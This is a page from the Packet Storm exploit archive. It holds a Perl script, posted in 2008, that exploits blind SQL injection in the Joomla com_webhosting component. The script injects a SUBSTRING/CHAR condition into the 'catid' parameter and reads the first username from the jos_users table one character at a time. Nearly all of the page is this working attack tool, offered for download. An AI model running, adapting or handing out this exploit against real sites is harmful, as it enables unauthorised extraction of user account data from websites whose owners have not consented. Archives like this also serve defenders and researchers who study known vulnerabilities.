what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

joomlawebhost-sql.txt

joomlawebhost-sql.txt
Posted May 1, 2008
Authored by Inphex

Blind SQL injection exploit for the Joomla Webhosting component.

tags | exploit, sql injection
SHA-256 | 4501c5a87daa1bce328737c9fd9aba3ee6e486c1b6c5f806a920980ffb1b226e

joomlawebhost-sql.txt

Change Mirror Download
#!/usr/bin/perl
#eSploit Framework - Inphex
use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;
use HTTP::Cookies;
use Switch;
$host_ = shift;
$path_ = shift;
$id_ = shift;
$non_find = shift; #choose anything thats inside the article of id
$column = "username"; #change if needet
$table = "jos_users"; #change if needet
$info{'info'} = {
"author" => ["cO2,Inphex"],
"name" => ["Joomla com_webhosting Blind SQL Injection"],
"version" => [],
"description" => ["This script will exploit a Blind SQL Injection Vulnerability in Joomla com_webhosting"],
"options" =>
{
"agent" => "",
"proxy" => "",
"default_headers" => [
["key","value"]],
"timeout" => 2,
"cookie" =>
{
"cookie" => ["key=value"],
},
},
"sending_options" =>
{
"host" => $host_,
"path" => $path_".index.php",
"port" => 80,
"method_a" => "SQL_INJECTION_BLIND",
"attack" =>
{
"option" => ["get","option","com_webhosting"],
"catid" => ["get","catid","".$id_."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),\$h,1)=CHAR(\$i)"],
"regex" => [[$non_find]],

},
},
};
&start($info{'info'},222);
open FH,">>ok.html";
print FH $return{222}{'content'};
sub start
{
$a_ = shift;
$id = shift;
$get_dA = get_d_p_s("get");
$post_dA = get_d_p_s("post");
my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
my $jj = 1;
my $ii = 48;
my $hh = 1;
my $ppp = 0;
my $s = shift;
my $a = "";
my $res_p = "";
my $h = "";
($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'});
$ua = LWP::UserAgent->new;
$ua->timeout($a_->{'options'}{'timeout'});
if ($a_->{'options'}{'proxy'}) {
$ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
}
$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";
$ua->agent($agent);
{
while (($k,$v) = each(%{$a_}))
{
if ($k ne "options" && $k ne "sending_options")
{
foreach $r (@{$a_->{$k}})
{
if ($a_->{$k}[0])
{
print $k.":".$a_->{$k}[0]."\n";
}
}
}
}

foreach $j (@{$a_->{'options'}{'default_headers'}})
{
$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
$m++;
}
if ($a_->{'options'}{'cookie'}{'cookie'}[0])
{
$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
}

}
switch ($method_m)
{
case "attack" { &attack();}
case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
case "REMOTE_COMMAND_EXECUTION" { &attack();}
case "REMOTE_CODE_EXECUTION" {&attack();}
case "REMOTE_FILE_INCLUSION" { &attack();}
case "LOCAL_FILE_INCLUSION" { &attack(); }
else { &attack(); }
}

sub attack
{

if ($post_dA eq "") {
$method = "get";
} elsif ($post_dA ne "")
{
$method = "post";
}
if ($method eq "get") {
$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
${$a_}{$id}{'content'} = $res_p;
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
{
if (${$jj} ne "")
{
${$a_}{$id}{'regex'}[$h] = ${$jj};
}
$jj++;
}
$h++;
}
} elsif ($method eq "post")
{
$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);

${$a_}{$id}{'content'} = $res_p;
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
{
if (${$jj} ne "")
{
${$a_}{$id}{'regex'}[$h] = ${$jj};
}
$jj++;
}
$h++;
}
}
}
sub sql_injection_blind
{
syswrite STDOUT,$column.":";
while ()
{
while ($ii <= 90)
{
if(check($ii,$hh) == 1)
{
syswrite STDOUT,lc(chr($ii));
$hh++;
$chr = $chr.chr($ii);
}
$ii++;
}
push(@ffs,length($chr));
if (($#ffs -1) == $ffs)
{
print "\nFinished/Error\n";
exit;
}
$ii = 48;
}
}
sub check($$)
{
$ii = shift;
$hh = shift;
if (get_d_p_s("post") ne "")
{
$method = "post";
} else { $method = "get";}
if ($method eq "get")
{
$ppp++;
$query = modify($get_dA,$ii,$hh);
$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
{
return 1;
}
else
{
return 0;
}
$h++;
}
} elsif ($method eq "post")
{
$ppp++;
$query_g = modify($get_dA,$ii,$hh);
$query_p = modify($post_dA,$ii,$hh);

$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
{
return 1;
}
else
{
return 0;
}
$h++;
}
}
}
sub modify($$$)
{
$string = shift;
$replace_by = shift;
$replace_by1 = shift;
if ($string !~/\$i/ && $string !~/\$h/) {
print $string;
} elsif ($string !~/\$i/)
{
$ff = substr($string,0,index($string,"\$h"));
$ee = substr($string,rindex($string,"\$h")+2);
$string = $ff.$replace_by1.$ee;
return $string;
} elsif ($string !~/\$h/)
{
$f = substr($string,0,index($string,"\$i"));
$e = substr($string,rindex($string,"\$i")+2);
$string = $f.$replace_by.$e;
return $string;
} else
{
$f = substr($string,0,index($string,"\$i"));
$e = substr($string,rindex($string,"\$i")+2);
$string = $f.$replace_by.$e;
$ff = substr($string,0,index($string,"\$h"));
$ee = substr($string,rindex($string,"\$h")+2);
$string = $ff.$replace_by1.$ee;
return $string;
}
}
sub get_d_p_s
{
$g_d_p_s = shift;
$post_data = "";
$get_data = "";
$header_data = "";
%header_dA = ();
while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
{
if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get")
{
$method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
}
elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post")
{
$method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
}
elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
{
$header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
}
$hp++;
}
$yy = $#get;
while ($bb <= $#get)
{
$get_data .= $get[$yy]."&";
$bb++;
$yy--;
}
$l = $#post;
while ($k <= $#post)
{

$post_data .= $post[$l]."&";
$k++;
$l--;
}
if ($g_d_p_s eq "get")
{

return $get_data;
}
elsif ($g_d_p_s eq "post")
{
return $post_data;
} elsif ($g_d_p_s eq "header")
{
return %header_dA;
}
}
sub get_data
{
$h_host_h_xdsjaop = shift;
$h_path_h_xdsjaop = shift;
%hash = get_d_p_s("header");
while (($u,$c) = each(%hash))
{
$ua->default_headers->push_header($u => $c);
}
$req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop);
return $req->content;
}
sub post_data
{
$h_host_h_xdsjaop = shift;
$h_path_h_xdsjaop = shift;
$content_type = shift;
$send = shift;
%hash = get_d_p_s("header");
while (($u,$c) = each(%hash))
{
$ua->default_headers->push_header($u => $c);
}
$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop);
$req->content_type($content_type);
$req->content($send);
$res = $ua->request($req);
return $res->content;
}
}
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close